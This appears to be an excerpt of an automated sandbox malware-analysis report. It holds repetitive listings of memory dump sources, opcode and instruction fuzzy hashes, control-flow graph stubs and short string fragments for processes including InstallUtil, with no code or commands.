                                                        • Instruction Fuzzy Hash: C7E02BB1C0210CDBC750FFF8C90068FB7F8EF44300F0005E58801831A0EE714A00A791
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 068466e3e14f1b256767c414ee8700336382a573ddbe37757c1ecf5e518be7ac
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: FDE0EC3890A10CEBCB04DF94D541AACBBB5EB85314F1091999C0A67341C6329E82DB81
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: b2e32e25afae2158a6b8fe1f373627e62f7e372e3c4a7f0719a7710dc8f74df3
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: BDE0123490A10CDBC704DF98D5429ACBBB9FB45314F1495DDDC0957341CA329E82DF85
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 6dbc7e173cca7610c8b3dae9d1f67df9618198c5eff8a560633b6bd6dc6d993f
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 3AE01234D0A10CDBC704DF94E5419ADBFB9FB46314F10959DDC0957341DA329E52DB85
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 19a1ef651b270c5a59e3184eabe64f0bb243a6375e3c9499736e48abe317c5ba
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 97E0123490A10CDBC704DFD4D5419ACBBB9FB45315F20919DDC0997341DA76AE42DB81
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 6b0b083ed73afb50b547cb37fed033b0eae5b88b562f1b18210990e9259e43c8
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 44E01274A0A10CDBCB04DFA4D6419ADFBB9FB45314F5091ADDC09A7341DB32AE42DB81
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: ffa303e4d38fc89d954424d9fe8388176f30c1ce76bae5911017f271397225ce
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 56E0123490A10CEBC704DF98D5419ACBFB9FB45314F1491A9DC4967341CA329E82DB81
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 804301a09ca0e26b19131272645fbf0e16f8cf526aa404a3ef71f3fc6922b520
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: EFE0C23490A10CEBC708DF94E5449ADFFB8FB45304F10949CCC0857341CA329E42DB80
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 82f248e564a14d31b1023d72fb4fefcd69c1bf299da585a64d2167628a9ded14
                                                        • Instruction ID: 30ea883bb9d3023aa3b4fc979e738dd8e929a9635860f39d0a78604521b17741
                                                        • Opcode Fuzzy Hash: 82f248e564a14d31b1023d72fb4fefcd69c1bf299da585a64d2167628a9ded14
                                                        • Instruction Fuzzy Hash: F2E0C770802208EBC780EFF8CA00A9EBBF8FB84300F0044A5884183190EE724A00ABA2
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 7bd1bcdd4a2570188819112135922fa457a6115d789518ed34ec96922e08c082
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 2FE0123490A10CDBC708DFD4D9459ACBBB5FB45314F109199DC0957341C6329E82DF81
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8

                                                        Execution Graph

                                                        Execution Coverage:16.2%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:6.5%
                                                        Total number of Nodes:62
                                                        Total number of Limit Nodes:7

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$(osq$(osq$,wq$,wq
                                                        • API String ID: 0-1903262254

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 07c59ceea1df969d41a05a34f3542a35b338df20403e7465a9af5ff3cf2eb8f9
                                                        • Instruction ID: 6253cf2519b987ac71bd9d1a454cf0de9f33c2e8316cde986e547d3099508248
                                                        • Opcode Fuzzy Hash: 07c59ceea1df969d41a05a34f3542a35b338df20403e7465a9af5ff3cf2eb8f9
                                                        • Instruction Fuzzy Hash: 4991C474E14218CFDB14DFA9D984A9DBBF2BF89300F14D069E419AB366DB709981DF20

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: dcc3553e49fd865e63e149da19a8539f2f8429d767391147911cdf934f7c9571
                                                        • Instruction ID: 64e9e8efd3bc2324fc984b3cb440a4dc570df6b45a68cf51e34a83b66fb4e842
                                                        • Opcode Fuzzy Hash: dcc3553e49fd865e63e149da19a8539f2f8429d767391147911cdf934f7c9571
                                                        • Instruction Fuzzy Hash: D281A3B4E04218CFEB14DFA9D984A9DBBF2BF89310F14D069E419AB365DB709981CF50

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 86f509c19858d4d44b2a5f0cd0ce2cdefc9feb1516365a32f436e2f20fe4ed8c
                                                        • Instruction ID: 59bdfdca7681b6a14121ef69f6b45afbd75f051d5476ec012852f2d614b099c0
                                                        • Opcode Fuzzy Hash: 86f509c19858d4d44b2a5f0cd0ce2cdefc9feb1516365a32f436e2f20fe4ed8c
                                                        • Instruction Fuzzy Hash: 5981B474E00218CFEB14DFA9D984A9DBBF2BF89310F14C069E819AB365DB709981CF10

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 3b2fbd3890ce52eafb1dd09d875575aab6e70a2f097d50ea16c649afe82197b1
                                                        • Instruction ID: 1fdd9f2799e516e682a0aefd037a8200eb2742e31a3c228a2da0e3f551a5545e
                                                        • Opcode Fuzzy Hash: 3b2fbd3890ce52eafb1dd09d875575aab6e70a2f097d50ea16c649afe82197b1
                                                        • Instruction Fuzzy Hash: EE81C374E04218CFEB14DFAAD984A9DBBF2BF89310F14C069E419AB365DB709981CF10

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: a59f87a1d003375b08c98ff19f1811c9c3025bfa8171b187981c1ce26999015e
                                                        • Instruction ID: 24b59f3a3744b14a1dbd17e42e4141f26f13f0fe8bcd49f5a14993c64e7da68a
                                                        • Opcode Fuzzy Hash: a59f87a1d003375b08c98ff19f1811c9c3025bfa8171b187981c1ce26999015e
                                                        • Instruction Fuzzy Hash: 6D81B174E05218CFDB54DFA9D984A9DBBF2BF89310F24C069E819AB365DB709981CF10

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$PHsq$PHsq
                                                        • API String ID: 0-255689168
                                                        • Opcode ID: 00396d3a0fff1b475fce6c59acaa5a574da8f64f29e3986544a2010af3689714
                                                        • Instruction ID: 4efb6244e76412d74bdd0ec09683945121263eacf0b7828b8a59ee63ac1a2bec
                                                        • Opcode Fuzzy Hash: 00396d3a0fff1b475fce6c59acaa5a574da8f64f29e3986544a2010af3689714
                                                        • Instruction Fuzzy Hash: E5810975E142089FDB14DFAAD984A9DFBF2FF89310F14C069E405AB2A6DB319842CF50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$4'sq
                                                        • API String ID: 0-2651803416
                                                        • Opcode ID: 09d98bc1cb1f6f4e3117b05a85ebe1d9ad877338fc1325c682d2f8cecc593447
                                                        • Instruction ID: f8d2f78e7cc7df67cf2986934991089fc508c146a1e05683c6eb7d08e4e5ced4
                                                        • Opcode Fuzzy Hash: 09d98bc1cb1f6f4e3117b05a85ebe1d9ad877338fc1325c682d2f8cecc593447
                                                        • Instruction Fuzzy Hash: CE828071A00209DFCB15CF68C984AAEBBF2FF99310F15855AE806DB2A1D731ED91CB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$Hwq
                                                        • API String ID: 0-1668724233
                                                        • Opcode ID: 10fd2079117a3c6741231a8bfb79053ae2b89864576980e8a3049ac1dca834b4
                                                        • Instruction ID: 8fe3f36f831f734cdaa7e21f1ef2ec27cc6cb644174710f497a67ae5f53df9f4
                                                        • Opcode Fuzzy Hash: 10fd2079117a3c6741231a8bfb79053ae2b89864576980e8a3049ac1dca834b4
                                                        • Instruction Fuzzy Hash: B5128E71A002189FCB18DFA9C854BAEBBB6FF89304F248529E545DB391DB349D42CF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xwq$$sq
                                                        • API String ID: 0-2558833440
                                                        • Opcode ID: 817a402074aabce5dddb8602d67b13d3885be74d5ba8858a5d0d291e5c6bc98c
                                                        • Instruction ID: 8db7686405f0cf55ee6780cef6a22bff71714435b193ddb8610f995169305c26
                                                        • Opcode Fuzzy Hash: 817a402074aabce5dddb8602d67b13d3885be74d5ba8858a5d0d291e5c6bc98c
                                                        • Instruction Fuzzy Hash: 11F16E75E042589FCF08DFB9D8955AEBBB2BF89300B14846EE406AB394CF349D06DB41
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08a8d03bd4c83d44670e457858d7965b01e091de77a908bf504a86ac29ba65c4
                                                        • Instruction ID: 18fb97a9a06cce40f62e391b4abad211fc04864ec684c5b49a6b3fb168640f4e
                                                        • Opcode Fuzzy Hash: 08a8d03bd4c83d44670e457858d7965b01e091de77a908bf504a86ac29ba65c4
                                                        • Instruction Fuzzy Hash: 1372B174E012298FDB64DFA9C984BDDBBB2BB4A300F1491E9D409A7295DB349EC1CF50

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'sq$4'sq$;sq
                                                        • API String ID: 0-111817264
                                                        • Opcode ID: 5b475fceffff28f9e40f2eadd77b82fbfbcd6ef4c429776892ca7c32b463e480
                                                        • Instruction ID: 034a69078c02895b2290d48cb5892c52f1cfc4126ad1b3bfb31e0555c9db0d00
                                                        • Opcode Fuzzy Hash: 5b475fceffff28f9e40f2eadd77b82fbfbcd6ef4c429776892ca7c32b463e480
                                                        • Instruction Fuzzy Hash: 8AF17B707142118FDB299B29C958B3D77A6AF86740F2944AAE502CF3E2EF2DCC429751

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $sq$$sq
                                                        • API String ID: 0-1184984226
                                                        • Opcode ID: 477a70ae89d2ecd406eb0122324fb00c5f1bf2b84f371d381432b61a57cb5ba6
                                                        • Instruction ID: b3bfb738ba1d8071d5ab960d54524c2abc5b632ad998ccd6cd88f2175aa334dd
                                                        • Opcode Fuzzy Hash: 477a70ae89d2ecd406eb0122324fb00c5f1bf2b84f371d381432b61a57cb5ba6
                                                        • Instruction Fuzzy Hash: 22521F74E002188FEB159BE4C860BEEBB72EF84300F5080AAD55A6B395DF359E85DF51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        • Opcode ID: 66d74ce4148304798c4ab2f6b5ffafee8e14dac51673deaab64a88d7189cef33
                                                        • Instruction ID: 80101b1731ab2b8a76aa441ccdfc569e6cf4a8b9dfad402bc0b0e862d2a1a698
                                                        • Opcode Fuzzy Hash: 66d74ce4148304798c4ab2f6b5ffafee8e14dac51673deaab64a88d7189cef33
                                                        • Instruction Fuzzy Hash: 75210571B442158FCB169F64E444BAB3BA2FBC9311F108429F849CB292CB74CD16CBD1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 90a232738fe1c088289a24194332b2f5ec026cf78395de834fb6fc6dbd4e43b3
                                                        • Instruction ID: 80109afd602e65e2b8bf1effb9328b705c9bbe571211d8fda926de9561dc33a2
                                                        • Opcode Fuzzy Hash: 90a232738fe1c088289a24194332b2f5ec026cf78395de834fb6fc6dbd4e43b3
                                                        • Instruction Fuzzy Hash: 9B115E71E442098FDB09DFAAD8456DEBBF2ABC9310F14D029D415BB295DB3884478E90
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af5cc3b2e46edc3dc52b671a46d8fe61bc7a6f7a5b09854dd5379f9d3dbd6450
                                                        • Instruction ID: 7605c052a79a300d2b5f66097b46f78ce6d67f423cec8e7449c83f00de7601ff
                                                        • Opcode Fuzzy Hash: af5cc3b2e46edc3dc52b671a46d8fe61bc7a6f7a5b09854dd5379f9d3dbd6450
                                                        • Instruction Fuzzy Hash: B8219FB0E052099FDB45EFB8D94079EBFF1FB45300F00D5AAD014AB265EB305A46DB82
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c210310dd77bc6c7b15fd2b0ec473fb30d6cda97a0d096157b012e87c1aa06a0
                                                        • Instruction ID: 15e5a495803111e2282df461a0f879e1942ddac0b99c7d75a568db2d6c36da73
                                                        • Opcode Fuzzy Hash: c210310dd77bc6c7b15fd2b0ec473fb30d6cda97a0d096157b012e87c1aa06a0
                                                        • Instruction Fuzzy Hash: 3911A531B00A228FD7195B39D49892EB7A6FFC57917154678E906CB391DF20DC0287D4
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b5872556f1b22cd40d4ec303d7347aa21b206fd5e396e05dd91a34507899cde4
                                                        • Instruction ID: 0693b5222c46a61eb786b25bd46f2bc43be4fb12db4918bbe52cabf351f5cd53
                                                        • Opcode Fuzzy Hash: b5872556f1b22cd40d4ec303d7347aa21b206fd5e396e05dd91a34507899cde4
                                                        • Instruction Fuzzy Hash: 7E112EB0E011099FDB54EFB9D940B9EBBF1FB45300F40D5AAD014AB365EB705A859BC1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1945ddc0968daca344bb08e55fedc11bbefb5995a6e092c5484e7f0947637c86
                                                        • Instruction ID: 58efee4ed7f5505c2e6643a0ec2bccd9992b652a078d08d33cf935d6010585aa
                                                        • Opcode Fuzzy Hash: 1945ddc0968daca344bb08e55fedc11bbefb5995a6e092c5484e7f0947637c86
                                                        • Instruction Fuzzy Hash: CE01B172F001246FCB05DE64A804BAF7BA7EFC9751F28802EFA05D7281CB72C8128795
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cde19679421c97b7d2fdacc2467a1086664bf293cbb3f397d833a2b823e7eb4
                                                        • Instruction ID: 32423e5c73315fdc397929f9c17fa3f993ace8c5b04da30037c452186f0ef682
                                                        • Opcode Fuzzy Hash: 6cde19679421c97b7d2fdacc2467a1086664bf293cbb3f397d833a2b823e7eb4
                                                        • Instruction Fuzzy Hash: 3CF02330EC91168FE706D765AC155ED7770D786310F00503DC001DB5D1C774C5478680
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c353bacce836d1bad302e8d8466fee9fa1513230aa0cbd820c77e6e888cbce1a
                                                        • Instruction ID: b75f2b298d4e553518a0b18dee74eadab782c39fa479bf959986d535e4bd5e51
                                                        • Opcode Fuzzy Hash: c353bacce836d1bad302e8d8466fee9fa1513230aa0cbd820c77e6e888cbce1a
                                                        • Instruction Fuzzy Hash: C3F03471A11225CFCB94EFBCC444AAE7BF0AF0D210B2144A9D40ADB760EB30DE008BD0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8613629205a1b7a9ca66efb23e0c4dd7233373a2f78844782e1cf07de1b5567b
                                                        • Instruction ID: 0b73dde09af05b5fe95f6bfcf522fe64ab4e023f166c26ed6cfe5eef855db206
                                                        • Opcode Fuzzy Hash: 8613629205a1b7a9ca66efb23e0c4dd7233373a2f78844782e1cf07de1b5567b
                                                        • Instruction Fuzzy Hash: 75E026E2C0D150CBD3108BAAA8260B9BF30DDEB31174460C7D0CACB9B1E728E606EB11
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 786f9230047a2ff71111f896bee9628746a4ccebca575e101c05058ace554a53
                                                        • Instruction ID: e3f152770791e9a84298426ed533e936a4bac1962910076c5c0b4e2376e74648
                                                        • Opcode Fuzzy Hash: 786f9230047a2ff71111f896bee9628746a4ccebca575e101c05058ace554a53
                                                        • Instruction Fuzzy Hash: B0E06131C2435BDBCF00AB64EC044DEBF34EE83220F515567E0502B001EB301549C3A2
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
